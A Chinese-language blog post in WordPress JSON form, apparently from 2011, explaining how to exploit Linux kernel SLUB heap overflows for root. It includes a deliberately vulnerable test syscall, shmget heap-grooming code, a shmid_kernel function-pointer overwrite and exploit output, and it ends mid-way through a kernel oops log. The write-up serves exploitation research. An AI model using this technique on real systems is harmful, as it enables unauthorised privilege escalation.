{"id":402,"date":"2011-01-15T10:40:48","date_gmt":"2011-01-15T10:40:48","guid":{"rendered":""},"modified":"2011-11-18T17:12:10","modified_gmt":"2011-11-18T09:12:10","slug":"402","status":"publish","type":"post","link":"http:\/\/zerobox.org\/notes\/402.html","title":{"rendered":"Exploit Linux Kernel Slub Overflow"},"content":{"rendered":"<h4>Exploit Linux Kernel Slub Overflow<\/h4>\n<pre style=\"width: 100%; word-wrap: break-word;\">By wzt\r\n\r\n\u4e00\u3001\u524d\u8a00\r\n\r\n    \u6700\u8fd1\u51e0\u5e74\u5173\u4e8ekernel exploit\u7684\u7814\u7a76\u6bd4\u8f83\u70ed\u95e8\uff0c\u5e38\u89c1\u7684\u5185\u6838\u63d0\u6743\u6f0f\u6d1e\u5927\u81f4\u53ef\u4ee5\u5206\u4e3a\u51e0\u7c7b\uff1a\r\n\u7a7a\u6307\u9488\u5f15\u7528\uff0c\u5185\u6838\u5806\u6808\u6ea2\u51fa\uff0c\u5185\u6838slab\u6ea2\u51fa\uff0c\u5185\u6838\u4efb\u610f\u5730\u5740\u53ef\u5199\u7b49\u7b49\u3002\u7a7a\u6307\u9488\u5f15\u7528\u6f0f\u6d1e\u6bd4\u8f83\r\n\u5bb9\u6613exploit\uff0c\u5178\u578b\u7684\u4f8b\u5b50\u5982sock_sendpage\uff0cudp_sendmsg\u3002\u4f46\u662f\u65b0\u5185\u6838\u7684\u5b89\u5168\u6a21\u5757\u5df2\u7ecf\u4e0d\r\n\u5728\u5141\u8bb8userspace\u7684code\u6620\u5c04\u4f4e\u5185\u5b58\u4e86\uff0c\u6240\u4ee5NULL pointer dereference\u66fe\u7ecf\u4e00\u5ea6\u53ea\u80fddos\uff0c\r\n\u4e0d\u80fd\u63d0\u6743\u3002\u4f46\u662fCVE-2010-4258\u8fd9\u4e2a\u5185\u6838\u4efb\u610f\u5730\u5740\u53ef\u5199\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u5c06null pointer dereference\r\n\u7684dos\u8f6c\u5316\u4e3a\u63d0\u6743\u3002\u5185\u6838\u5806\u6808\u6ea2\u51fa\u76f8\u5bf9userspace\u4e0b\u7684\u5806\u6808\u6ea2\u51fa\u6bd4\u8f83\u597dexploit\u3002\u8fd9\u91cc\u6700\u96beexploit\r\n\u7684\u662fkernel\u7684slab\u6ea2\u51fa\u3002\u5173\u4e8eslab\u7684\u6ea2\u51fa\u572805\u5e74\u7684\u65f6\u5019\uff0cUNF\u7684qobaiashi\u5c31\u5199\u8fc7paper\u6765\u9610\u8ff0\r\nslab\u7684exploit\u65b9\u6cd5\u3002\u6b64\u540e\u5173\u4e8eslab\u7684\u6ea2\u51fa\u7814\u7a76\u5728\u90fd\u96c6\u4e2d\u57282.4\u5185\u6838\u4e0a\uff0c2.6\u4e0b\u7684slab\u6ea2\u51fa\u4e00\r\n\u76f4\u6ca1\u770b\u5230\u6709\u76f8\u5173\u7684paper\u5171\u4eab\u51fa\u6765\u3002\r\n\r\n    \u5728kernel 2.6.22\u7684\u65f6\u5019\uff0ckernel\u4e3a\u4e86\u6539\u5584slab\u7684\u6027\u80fd\uff0c\u5f15\u5165\u4e86slub\u7684\u8bbe\u8ba1\u3002\u9488\u5bf9slub\r\n\u6ea2\u51fa\u7684paper\u4e00\u76f4\u6ca1\u6709\u88ab\u5171\u4eab\u76f4\u5230Jon Oberheide\u53d1\u5e03\u4e86\u4e00\u4e2a\u9488\u5bf9CAN\u534f\u8bae\u7684slub\u6ea2\u51fa\u7684exploit\uff0c\r\n\u8fd9\u4e2a\u5e94\u8be5\u662f\u7b2c\u4e00\u4e2a\u516c\u5f00\u7684\u57282.6kernel\u4e0a\u5229\u7528slab\u6ea2\u51fa\u7684exploit\uff0c\u5728ubuntu-10.04 2.6.32\r\n\u7684kernel\u4e0a\u8fd0\u884c\u6210\u529f\u3002Jon Oberheide\u5728\u4ed6\u7684blog\u4e0a\u4e5f\u6709\u7bc7\u5173\u4e8e\u5206\u6790slub\u6ea2\u51fa\u7684paper\uff0c\u4f46\u662f\r\n\u8fd9\u4e2aexploit\u7531\u4e8e\u5229\u7528\u4e86CAN\u4ee3\u7801\u4e0a\u7684\u4e00\u4e9b\u4f18\u52bf\uff0c\u5e76\u6ca1\u6709\u628aslub\u6ea2\u51fa\u7684\u7cbe\u9ad3\u4f53\u73b0\u51fa\u6765\u3002\u5728\u6df1\u5165\r\n\u7814\u7a76\u4e86\u8fd9\u4e2aexploit\u7684\u57fa\u7840\u4e0a\uff0c\u5728\u52a0\u4e0a\u6211\u8c03\u8bd52.4\u5185\u6838slab\u6ea2\u51fa\u7684\u7ecf\u9a8c\uff0c\u7814\u7a76\u4e86\u4e00\u4e0bslub\u7684\u6ea2\r\n\u51fa\u6280\u672f\uff0c\u5728centos 5.4 + 2.6.32\u73af\u5883\u6d4b\u8bd5\u6210\u529f\u3002\r\n\r\n\u4e8c\u3001\u793a\u4f8b\u4ee3\u7801\uff1a\r\n\r\n    \u4e3a\u4e86\u4fbf\u4e8e\u8c03\u8bd5\uff0c\u6211\u81ea\u5df1\u5199\u4e86\u4e00\u4e2aLKM\u6a21\u5757\uff0c\u7ed9\u5185\u6838\u65b0\u589e\u4e86\u4e00\u4e2a\u7cfb\u7edf\u8c03\u7528\uff0c\u7528\u6237\u53ef\u4ee5\u901a\u8fc7\r\napi\u63a5\u53e3\u6765\u8c03\u7528\u3002\r\n\r\n--code-------------------------------------------------------------------------\r\n#define BUFFER_SIZE\t80\r\n\r\nasmlinkage long kmalloc_overflow_test(char *addr, int size)\r\n{\r\n        char *buff = NULL;\r\n\r\n        buff = kmalloc(BUFFER_SIZE, GFP_KERNEL);\r\n        if (!buff) {\r\n                printk(\"kmalloc failed.\r\n\");\r\n                return -1;\r\n        }\r\n        printk(\"[+] Got object at 0x%p\r\n\", buff);\r\n\r\n        if (copy_from_user(buff, addr, size)) {\r\n\t\tprintk(\"copy_from_user failed.\r\n\");\r\n                kfree(buff);\r\n\t\treturn -1;\r\n        }\r\n\tprintk(\"%s\r\n\", buff);\r\n\r\n        return 0;\r\n}\r\n-------------------------------------------------------------------------------\r\n\r\n    \u8fd9\u6bb5\u4ee3\u7801\u7528kmalloc\u5206\u914d\u4e8680\u5b57\u8282\u7684\u7a7a\u95f4\uff0c\u4f46\u6ca1\u6709\u68c0\u67e5size\u7684\u5927\u5c0f\uff0c\u7528\u6237\u4f20\u9012\u4e00\u4e2a\u5927\u4e8e\r\n80\u7684size\u503c\u5c06\u4f1a\u4ea7\u751f\u5185\u6838\u5806\u6ea2\u51fa\u3002\r\n\r\n\u4e09\u3001SLUB\u7ed3\u6784\r\n\r\n    slub\u5927\u5927\u7b80\u5316\u4e86slab\u7684\u6570\u636e\u7ed3\u6784\uff0c\u5982\u4ecekmem_cache\u76843\u4e2a\u5173\u4e8eslab\u7684\u961f\u5217\u4e2d\u53bb\u6389\u4e86\u5b8c\u5168\r\n\u6ee1\u7684\u961f\u5217\u3002\u6bcf\u4e2aslab\u7684\u5f00\u59cb\u4e5f\u6ca1\u6709\u4e86slab\u7ba1\u7406\u7ed3\u6784\u548c\u7ba1\u7406\u7a7aobj\u7684kmem_bufctl_t\u6570\u7ec4\u3002\u4e00\u4e2a\r\n\u91c7\u7528slub\u7ba1\u7406\u7684slab\u7ed3\u6784\u5982\u4e0b\uff1a\r\n\r\n    \u4e00\u4e2aslab\u7684\u7ed3\u6784\uff1a\r\n\r\n    +-------------------------------------------+\r\n    | obj | obj | obj |   ...               |obj|\r\n    +-------------------------------------------+  \r\n\r\n    \u6839\u636e\u4e0a\u9762\u7684\u4ee3\u7801\u7247\u6bb5\uff0c\u5728\u4e00\u4e2aobj\u6ea2\u51fa\u540e\uff0c\u810f\u6570\u636e\u4f1a\u76f4\u63a5\u8986\u76d6\u540e\u9762\u76f8\u90bb\u7684\u90a3\u4e2aobj\uff1a\r\n\r\n    |first|second|\r\n    +-------------------------------------------+\r\n    | obj | obj | obj |   ...               |obj|\r\n    +-------------------------------------------+\r\n    |-----overflow---&gt;|\r\n\r\n    \u5f53\u6709\u5185\u6838\u4ee3\u7801\u8bbf\u95ee\u4e86\u88ab\u6ea2\u51fa\u7684obj\u4e2d\u7684\u6570\u636e\u7ed3\u6784\u540e\uff0c\u5c31\u4f1a\u4ea7\u751foops\u3002\r\n\r\n\u56db\u3001SLUB\u6ea2\u51fa\u65b9\u6cd5\r\n\r\n    \u5185\u6838\u63d0\u6743\u7684\u6700\u7ec8\u76ee\u7684\u5c31\u662f\u89e6\u53d1\u67d0\u4e2akernel bug\uff0c\u7136\u540e\u63a7\u5236\u5185\u6838\u8def\u5f84\u5230userspace\u4e8b\u5148\u5e03\r\n\u7f6e\u597d\u7684shellcode\u4e0a\u3002\u56e0\u6b64\u6211\u4eec\u7684\u5927\u65b9\u5411\u662f\u5728second obj\u4e2d\u5982\u679c\u6709\u4e00\u4e2a\u51fd\u6570\u6307\u9488\u80fd\u88ab\u810f\u6570\u636e\r\n\u8986\u76d6\u4e3auserspace\u4e0b\u7684shellcode\uff0c\u5e76\u4e14\u7528\u6237\u53c8\u80fd\u8c03\u7528\u8fd9\u4e2a\u51fd\u6570\u6307\u9488\uff0c\u90a3\u4e48\u5c06\u4f1a\u5b8c\u6210\u6743\u9650\u63d0\u5347\r\n\u7684\u4efb\u52a1\u3002\u8fd8\u6709\u4e00\u4e2a\u8981\u5904\u7406\u7684\u95ee\u9898\u5c31\u662f\u5982\u4f55\u4fdd\u8bc1\u5728\u6709bug\u7684\u4ee3\u7801\u4e2d\u7528kmalloc\u5206\u914d\u7684obj\u548c\u6211\u4eec\r\n\u60f3\u8981\u8986\u76d6\u7684\u51fd\u6570\u6307\u9488\u6240\u5728\u7684obj\u662f\u76f8\u90bb\u7684\u3002\u56e0\u4e3a\u53ea\u80fd\u4e24\u8005\u76f8\u90bb\uff0c\u624d\u80fd\u7528\u6ea2\u51fa\u7684\u6570\u636e\u8986\u76d6\u51fd\u6570\r\n\u6307\u9488\u3002\r\n\r\n    \u6211\u4eec\u5148\u5047\u8bbe\u5df2\u7ecf\u5728kernel\u4e2d\u627e\u5230\u4e86\u4e00\u4e2a\u6570\u636e\u7ed3\u6784\uff0c\u6b63\u597d\u6ee1\u8db3\u4e86\u4e0a\u9762\u7684\u9700\u6c42\uff0c\u73b0\u5728\u53ea\u8981\u4fdd\r\n\u8bc1\u4e24\u4e2aobj\u662f\u76f8\u90bb\u7684\uff0c\u5c31\u80fd\u5b8c\u6210\u6307\u9488\u8986\u76d6\u3002\u6211\u4eec\u77e5\u9053slab\u7684\u4e00\u4e2a\u7279\u6027\u662f\u5f53\u4e00\u4e2acache\u4e2d\u7684\u6240\u6709\r\nslab\u7ed3\u6784\u4e2d\u7684obj\u90fd\u7528\u5b8c\u7684\u65f6\u5019\uff0c\u5185\u6838\u5c06\u4f1a\u91cd\u65b0\u5206\u914d\u4e00\u4e2aslab\uff0c\u65b0\u5206\u914d\u7684slab\u4e2d\u7684obj\u5f7c\u6b64\u90fd\r\n\u662f\u76f8\u90bb\u7684\uff1a\r\n\r\nKmalloc()-&gt;__kmalloc()-&gt;__do_kmalloc()-&gt;__cache_alloc()-&gt;____cache_alloc()\r\n-&gt;cache_alloc_refill()-&gt;cache_grow()-&gt;cache_init_objs()\r\n--code-------------------------------------------------------------------------\r\nstatic void cache_init_objs(struct kmem_cache *cachep,\r\nstruct slab *slabp, unsigned long ctor_flags)\r\n{\r\n\tfor (i = 0; i &lt; cachep-&gt;num; i++) {\r\n\t\tvoid *objp = index_to_obj(cachep, slabp, i);\r\n\t\tslab_bufctl(slabp)[i] = i + 1;\r\n\t}\r\n\tslab_bufctl(slabp)[i - 1] = BUFCTL_END;\r\n\tslabp-&gt;free = 0;\r\n}\r\n-------------------------------------------------------------------------------\r\n\r\n    \u524d\u9762\u5728slab\u7684\u7ed3\u6784\u4e2d\u63d0\u5230\u6709\u4e2akmem_bufctl_t\u6570\u7ec4\uff0c\u91cc\u9762\u7684\u6bcf\u4e2a\u5143\u7d20\u6307\u5411\u4e0b\u4e00\u4e2a\u7a7a\u95f2obj\r\n\u7684\u7d22\u5f15\u3002\u5728\u521d\u59cb\u5316\u4e00\u4e2a\u65b0\u7684slab\u65f6\uff0c\u6bcf\u4e2akmem_bufctl_t\u5143\u7d20\u90fd\u987a\u5e8f\u7684\u6307\u5411\u4e86\u4e0e\u5b83\u76f8\u90bb\u7684\u4e0b\u4e00\r\n\u4e2aobj\uff0c\u6240\u4ee5\u5f53\u5185\u6838\u91cd\u65b0\u5206\u914d\u4e00\u4e2aslab\u7ed3\u6784\u65f6\uff0c\u6211\u4eec\u4ece\u8fd9\u4e2a\u65b0\u7684slab\u4e2d\u5206\u914d\u7684obj\u90fd\u662f\u76f8\u90bb\u7684\u3002\r\n\r\n    \u90a3\u4e48SLUB\u662f\u4e0d\u662f\u4e5f\u6ee1\u8db3\u8fd9\u4e2a\u7279\u6027\u5462\uff1f\u5728\u4ed4\u7ec6\u8bfb\u8fc7slub\u7684\u4ee3\u7801\u540e\uff0c\u53d1\u73b0\u5b83\u4e5f\u6ee1\u8db3\u8fd9\u4e2a\u7279\u6027\uff1a\r\n\r\nkmalloc()-&gt;slab_alloc()-&gt;__slab_alloc()-&gt;new_slab():\r\n--code-------------------------------------------------------------------------\r\nstatic struct page *new_slab(struct kmem_cache *s, gfp_t flags, int node)\r\n{\r\n        last = start;\r\n        for_each_object(p, s, start, page-&gt;objects) {\r\n                setup_object(s, page, last);\r\n                set_freepointer(s, last, p);\r\n                last = p;\r\n        }\r\n        setup_object(s, page, last);\r\n        set_freepointer(s, last, NULL);\r\n}\r\n#define for_each_object(__p, __s, __addr, __objects)\r\n        for (__p = (__addr); __p &lt; (__addr) + (__objects) * (__s)-&gt;size;\r\n                        __p += (__s)-&gt;size)\r\n-------------------------------------------------------------------------------\r\n\r\n    \u8fd9\u6bb5\u4ee3\u7801\u904d\u5386\u4e00\u4e2apage\u4e2d\u7684\u6240\u6709obj\u8fdb\u884c\u521d\u59cb\u5316\uff1a\r\n\r\n--code-------------------------------------------------------------------------\r\nstatic inline void set_freepointer(struct kmem_cache *s, void *object, void *fp)\r\n{\r\n        *(void **)(object + s-&gt;offset) = fp;\r\n}\r\n-------------------------------------------------------------------------------\r\n\r\n    s-&gt;offset\u4fdd\u5b58\u7684\u662f\u4e00\u4e2aslab\u4e2d\u4e0b\u4e00\u4e2a\u7a7a\u95f2\u7684obj\u504f\u79fb\uff0cset_freepointer\u51fd\u6570\u5c06\u4e00\u4e2aobj\r\n\u7684\u4e0b\u4e00\u4e2a\u7a7a\u95f2\u6307\u9488\u6307\u5411\u4e86\u4e0b\u4e00\u4e2aobj\u3002\u6240\u4ee5slub\u4e5f\u6ee1\u8db3\u8fd9\u4e2a\u7279\u6027\u3002\r\n\r\n    \u73b0\u5728\u6211\u4eec\u53ea\u8981\u5728\u7528\u6237\u7a7a\u95f4\u627e\u5230\u4e00\u79cd\u65b9\u6cd5\u6765\u4e0d\u65ad\u6d88\u8017\u5927\u5c0f\u4e3a96\u7684slab\uff0c\u5f53\u73b0\u6709\u7684slab\u7528\u5b8c\r\n\u7684\u65f6\u5019\uff0c\u65b0\u5206\u914d\u7684slab\u4e2d\u7684obj\u5c31\u662f\u8fde\u7eed\u76f8\u90bb\u7684\u3002\u5982\u4f55\u6d88\u8017slab\uff0c\u6211\u4eec\u4ecd\u7136\u53ef\u4ee5\u7528shmget\u7cfb\r\n\u7edf\u8c03\u7528\u6765\u5904\u7406\uff0c\u5e76\u4e14\u5b83\u7528\u5230\u7684struct shmid_kernel\u7ed3\u6784\u4e2d\uff0c\u5c31\u6709\u6211\u4eec\u60f3\u8986\u76d6\u7684\u51fd\u6570\u6307\u9488\uff01\r\n\r\nipc\/shm.c:\r\n--code-------------------------------------------------------------------------\r\nsys_shmget-&gt;ipcget-&gt;ipcget_new-&gt;newseg:\r\nstatic int newseg(struct ipc_namespace *ns, struct ipc_params *params)\r\n{\r\n        struct shmid_kernel *shp;\r\n\r\n        shp = ipc_rcu_alloc(sizeof(*shp));\r\n\tshp-&gt;shm_file = file;\r\n}\r\nvoid* ipc_rcu_alloc(int size)\r\n{\r\n\tout = kmalloc(HDRLEN_KMALLOC + size, GFP_KERNEL);\r\n}\r\n-------------------------------------------------------------------------------\r\n\r\n    \u56e0\u6b64\u53ea\u8981\u5728\u7528\u6237\u7a7a\u95f4\u4e0d\u65ad\u8c03\u7528shmget\u5c31\u4f1a\u5728\u5185\u6838\u4e2d\u4e0d\u65ad\u6d88\u8017\u5927\u5c0f\u4e3a96\u7684slab\u3002\u793a\u4f8b\u4e2d\u7684\r\n\u4ee3\u7801\u5206\u914d\u7684\u662f80\u4e2a\u5b57\u8282\uff0c\u5b83\u5c06\u4f1a\u572896\u5927\u5c0f\u7684slab\u4e2d\u5206\u914d\uff0c\u8fd9\u91cc\u8fd8\u6709\u4e00\u70b9\u9700\u8981\u6ce8\u610f\uff1a\r\n\r\n--code-------------------------------------------------------------------------\r\nout = kmalloc(HDRLEN_KMALLOC + size, GFP_KERNEL);\r\n-------------------------------------------------------------------------------\r\n\r\n    \u7528shmget\u5206\u914d\u7684obj\u524d\u6bb5\u90fd\u6709\u4e00\u4e2a8\u4e2a\u5b57\u8282\u7684\u7ad9\u4f4d\u7a7a\u95f4\uff0c\u56e0\u6b64\u7528shmget\u5206\u914d\u7684shmid_kernel\r\n\u7ed3\u6784\u5c06\u4f1a\u5982\u4e0b\uff1a\r\n\r\n    | ------ 96 --------------------| ---------------96 ------------|\r\n    +---------------------------------------------------------------+\r\n    | HDRLEN_KMALLOC | shmid_kernel | HDRLEN_KMALLOC | shmid_kernel |\r\n    +---------------------------------------------------------------+  \r\n\r\n    \u5728\u4ee5\u540e\u8986\u76d6\u7684\u65f6\u5019\u9700\u8981\u8df3\u8fc7HDRLEN_KMALLOC\u4e2a\u5b57\u8282\u3002\r\n\r\n    \u5185\u6838\u4e2d\u5173\u4e8eslab\u7684\u4fe1\u606f\uff0c\u53ef\u4ee5\u5728\/proc\/slabinfo\u5f97\u5230:\r\n\r\n-------------------------------------------------------------------------------\r\n[wzt@localhost exp]$ cat \/proc\/slabinfo |grep kmalloc-96\r\nkmalloc-96           922    924     96   42    1 : tunables    0    0    0 : slabdata     22     22      0\r\n-------------------------------------------------------------------------------\r\n\r\n    922\u4e3a\u5f53\u524d\u6d3b\u8dc3\u7684obj\u6570\u76ee\uff0c924\u662f\u6240\u6709slab\u4e2dobj\u7684\u6570\u76ee\uff0c\u56e0\u6b64\u6211\u4eec\u5728\u7528\u6237\u7a7a\u95f4\u4e2d\u53ef\u4ee5\u89e3\r\n\u6790\u8fd9\u4e2a\u6587\u4ef6\u6765\u5f97\u5230\u5f53\u524d\u7cfb\u7edf\u4e2d\u5269\u4f59\u7684obj\u6570\u76ee\uff1a\r\n\r\n--code-------------------------------------------------------------------------\r\nint check_slab(char *slab_name, int *active, int *total)\r\n{\r\n        FILE *fp;\r\n        char buff[1024], name[64];\r\n        int active_num, total_num;\r\n\r\n        fp = fopen(\"\/proc\/slabinfo\", \"r\");\r\n        if (!fp) {\r\n                perror(\"fopen\");\r\n                return -1;\r\n        }\r\n\r\n        while (fgets(buff, 1024, fp) != NULL) {\r\n                sscanf(buff, \"%s %u %u\", name, &amp;active_num, &amp;total_num);\r\n                if (!strcmp(slab_name, name)) {\r\n                        *active = active_num;\r\n                        *total = total_num;\r\n                        return total_num - active_num;\r\n                }\r\n        }\r\n\r\n        return -1;\r\n}\r\n-------------------------------------------------------------------------------\r\n\r\n    \u73b0\u5728\u5199\u4e00\u6bb5code\u6765\u4e0d\u65ad\u8c03\u7528shmget\uff0c\u770b\u770b\u65b0\u5206\u914d\u7684obj\u662f\u4e0d\u662f\u8fde\u7eed\u7684\uff0c\u4e3a\u4e86\u8c03\u8bd5\u65b9\u4fbf\uff0c\r\n\u6211\u4fee\u6539\u4e86sys_shmget\u7684\u4ee3\u7801\uff0c\u52a0\u5165\u4e86printk\u7528\u4e8e\u6253\u5370kmalloc\u540e\u7684\u5730\u5740\u3002trigger\u7a0b\u5e8f\u7684\u4ee3\u7801\r\n\u7247\u6bb5\u5982\u4e0b\uff1a\r\n\r\ntrigger.c:\r\n--code-------------------------------------------------------------------------\r\n...\r\n        shmids = malloc(sizeof(int) * (free_num + SLAB_NUM * 3));\r\n\r\n        fprintf(stdout, \"[+] smashing free slab ...\r\n\");\r\n        for (i = 0; i &lt; free_num + SLAB_NUM; i++) {\r\n                if (!check_slab(SLAB_NAME, &amp;active_num, &amp;total_num))\r\n                        break;\r\n\r\n                shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);\r\n                if (shmids[i] &lt; 0) {\r\n                        perror(\"shmget\");\r\n                        return -1;\r\n                }\r\n        }\r\n        base = i;\r\n        fprintf(stdout, \"[+] smashing %d total: %d active: %d free: %d\r\n\",\r\n                i, total_num, active_num, total_num - active_num);\r\n\r\n        fprintf(stdout, \"[+] smashing adjacent slab ...\r\n\");\r\n        i = base;\r\n        for (; i &lt; base + SLAB_NUM; i++) {\r\n                shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);\r\n                if (shmids[i] &lt; 0) {\r\n                        perror(\"shmget\");\r\n                        return -1;\r\n                }\r\n        }\r\n        check_slab(SLAB_NAME, &amp;active_num, &amp;total_num);\r\n        fprintf(stdout, \"[+] smashing %d total: %d active: %d free: %d\r\n\",\r\n                i, total_num, active_num, total_num - active_num);\r\n...\r\n\r\n[wzt@localhost exp]$ .\/exp\r\n[+] mmaping kernel code at 0x41414141 ok.\r\n[+] looking for symbols...\r\n[+] found commit_creds addr at 0xc0446524.\r\n[+] found prepare_kernel_cred addr at 0xc0446710.\r\n[+] setting up exploit payload...\r\n[+] checking slab total: 840 active: 836 free: 4\r\n[+] smashing free slab ...\r\n[+] smashing 17 total: 840 active: 840 free: 0\r\n[+] smashing adjacent slab ...\r\n[+] smashing 117 total: 966 active: 966 free: 0\r\n-------------------------------------------------------------------------------\r\n\r\n    \u53ef\u4ee5\u770b\u5230dmesg\u540e\u7684\u4fe1\u606f\uff0c\u65b0\u7684obj\u90fd\u662f\u8fde\u7eed\u7684\u3002\r\n\r\n-------------------------------------------------------------------------------\r\n[wzt@localhost exp]$ dmesg|tail -n 10\r\n[+] kmalloc at 0xdf1ea120\r\n[+] kmalloc at 0xdf1ea180\r\n[+] kmalloc at 0xdf1ea1e0\r\n[+] kmalloc at 0xdf1ea240\r\n[+] kmalloc at 0xdf1ea2a0\r\n[+] kmalloc at 0xdf1ea300\r\n[+] kmalloc at 0xdf1ea360\r\n[+] kmalloc at 0xdf1ea3c0\r\n[+] kmalloc at 0xdf1ea420\r\n[+] kmalloc at 0xdf1ea480\r\n-------------------------------------------------------------------------------\r\n\r\n    ok\uff0c\u6211\u4eec\u5df2\u7ecf\u80fd\u83b7\u5f97\u4e00\u4e2a\u8fde\u7eed\u7684obj\u4e86\uff0c\u73b0\u5728\u8981\u5229\u7528slub\u7684\u53e6\u4e00\u4e2a\u7279\u6027\uff1aFIFO\uff0c\u5148\u5728\u8fd9\r\n\u4e9b\u8fde\u7eed\u7684obj\u4e2d\u9009\u53d6\u4e00\u4e2aobj\u91ca\u653e\u6389\uff0c\u7136\u540e\u9a6c\u4e0a\u89e6\u53d1\u6709bug\u7684\u4ee3\u7801\uff0c\u90a3\u4e48\u6709bug\u7684\u4ee3\u7801\u8c03\u7528kmalloc\r\n\u5206\u914d\u7684obj\u5730\u5740\u5c31\u662f\u521a\u624d\u91ca\u653e\u6389\u7684\u90a3\u4e2aobj\uff0c\u5f53\u6ea2\u51fa\u53d1\u751f\u540e\uff0c\u810f\u6570\u636e\u5c06\u4f1a\u8986\u76d6\u5b83\u76f8\u90bb\u7684\u4e0b\u4e00\u4e2a\r\nobj\u3002\u53ef\u4ee5\u7528\u5982\u4e0b\u4ee3\u7801\u6765\u89e6\u53d1\uff1a\r\n\r\ntrigger.c:\r\n--code-------------------------------------------------------------------------\r\n...\r\n        free_idx = i - 4;\r\n        fprintf(stdout, \"[+] free exist shmid with idx: %d\r\n\", free_idx);\r\n        if (shmctl(shmids[free_idx], IPC_RMID, NULL) == -1) {\r\n                perror(\"shmctl\");\r\n        }\r\n\r\n        fprintf(stdout, \"[+] trigger kmalloc overflow in %s\r\n\", SLAB_NAME);\r\n        memset(buff, 0x41, sizeof(buff));\r\n\tkmalloc_overflow_test(buff, SLAB_SIZE + HDRLEN_KMALLOC + sizeof(shmid_kernel));\r\n...\r\n-------------------------------------------------------------------------------\r\n\r\n    \u5728\u8fd9\u91cc\u6211\u4eec\u5c06\u5012\u6570\u7b2c4\u4e2aobj\u91ca\u653e\u6389\uff0c\u6267\u884c\u540edmesg\u53ef\u4ee5\u770b\u5230\uff1a\r\n\r\n-------------------------------------------------------------------------------\r\n[+] kmalloc at 0xd3decc00\r\n[+] kmalloc at 0xd3decc60\r\n[+] kmalloc at 0xd3deccc0\r\n[+] kmalloc at 0xd3decd20\r\n[+] kmalloc at 0xd3decd80\r\n[-] kfree at 0xd3decc60\r\n...............................\r\n[+] Got object at 0xd3decc60\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n-------------------------------------------------------------------------------\r\n\r\n    shmctl\u91ca\u653e\u6389\u4e860xd3decc60\u5730\u5740\u540e\uff0c\u6709bug\u7684kmalloc\u5206\u914d\u7684\u5730\u5740\u4e5f\u662f0xd3decc60\u3002\r\n\r\n-------------------------------------------------------------------------------\r\n[wzt@localhost exp]$ tail \/proc\/sysvipc\/shm\r\n         0    8192250     0       1024  3148     0      0   500   500   500   500          0          0 1293098372\r\n1094795585 1094795585     0        500 134522884     0    500 1094795585 1094795585     0     0 4294967295        252          0\r\n1094795585 1094795585     0       1024  3148     0      0   500   500   500   500          0          0 1293098372\r\n         0    8323326     0       1024  3148     0      0   500   500   500   500          0          0 1293098372\r\n-------------------------------------------------------------------------------\r\n\r\n    \u53ef\u4ee5\u770b\u5230\u4e0e0xd3decc60\u76f8\u90bb\u7684\u4e0b\u4e00\u4e2aobj\u5730\u57400xd3deccc0\u4e2d\u7684shmid_kernel\u7ed3\u6784\u5df2\u7ecf\u88ab\r\n\u8986\u76d6\u4e86\u3002\r\n\r\n    \u73b0\u5728\u6211\u4eec\u53ef\u4ee5\u6765\u8986\u76d6\u4e00\u4e2a\u51fd\u6570\u6307\u9488\u4e86\uff0c\u5728shmid_kernel\u4e2d\u6b63\u597d\u6709\u6ee1\u8db3\u6211\u4eec\u9700\u8981\u7684\u51fd\u6570\u6307\r\n\u9488!\r\n\r\n    kernel\u4e2d\u5904\u7406ipc\u5171\u4eab\u5185\u5b58\u7684\u4e00\u4e2a\u6570\u636e\u7ed3\u6784struct shmid_kernel\uff1a\r\n\r\n--code-------------------------------------------------------------------------\r\nstruct shmid_kernel \/* private to the kernel *\/\r\n{\r\n        struct kern_ipc_perm    shm_perm;\r\n        struct file *           shm_file;\r\n        unsigned long           shm_nattch;\r\n        unsigned long           shm_segsz;\r\n        time_t                  shm_atim;\r\n        time_t                  shm_dtim;\r\n        time_t                  shm_ctim;\r\n        pid_t                   shm_cprid;\r\n        pid_t                   shm_lprid;\r\n        struct user_struct      *mlock_user;\r\n};      \r\n\r\nstruct shmid_kernel {\r\n\t.shm_file = struct file {\r\n\t\t.f_op = struct file_operations = {\r\n\t\t\t.mmap = ATTACKER_ADDRESS\r\n\t\t}\r\n\t}\r\n}\r\n-------------------------------------------------------------------------------\r\n\r\n    \u53ef\u4ee5\u7528shmat\u7684\u7cfb\u7edf\u8c03\u7528\u6765\u89e6\u53d1\uff1a\r\n\r\n--code-------------------------------------------------------------------------\r\nsys_shmat()-&gt;do_shmat():\r\nlong do_shmat(int shmid, char __user *shmaddr, int shmflg, ulong *raddr)\r\n{\r\n\tuser_addr = do_mmap(file, addr, size, prot, flags, 0);\r\n}\r\n-------------------------------------------------------------------------------\r\n\r\n    do_mmap\u5c06\u88ab\u8986\u76d6\u4e3ashellcode\u5730\u5740\u3002\r\n\r\n    ok\uff0c\u73b0\u5728\u53ef\u4ee5\u5199\u4e00\u4e2a\u5b8c\u6574\u7684exp\u4e86\uff0c\u8bd5\u8bd5\u5148\uff1a\r\n\r\n-------------------------------------------------------------------------------\r\n[wzt@localhost exp]$ .\/exp\r\n\u6267\u884c\u540e\u7cfb\u7edf\u6302\u6389\u4e86\uff0c \u770b\u4e0bdmesg\u4fe1\u606f\uff1a\r\n[+] kmalloc at 0xd31752a0\r\n[+] kmalloc at 0xd3175300\r\n[+] kmalloc at 0xd3175360\r\n[+] kmalloc at 0xd31753c0\r\n[+] kmalloc at 0xd3175420\r\n[+] kmalloc at 0xd3175480\r\n[+] kmalloc at 0xd31754e0\r\n[-] kfree at 0xd31753c0\r\n...............................\r\n[+] Got object at 0xd31753c0\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nBUG: unable to handle kernel NULL pointer dereference at (null)\r\nIP: [&lt;c04fc352&gt;] ipc_has_perm+0x46\/0x61\r\n*pde = 00000000\r\nOops: 0000 [#1] SMP\r\nlast sysfs file: \/sys\/devices\/pci0000:00\/0000:00:05.0\/local_cpus\r\nModules linked in: sys ipv6 autofs4 sunrpc ip_tables ip6_tables x_tables dm_multipath video output sbs sbshc battery ac parport_pc lp parport snd_intel8x0 snd_ac97_codec ac97_bus snd_seq_dummy 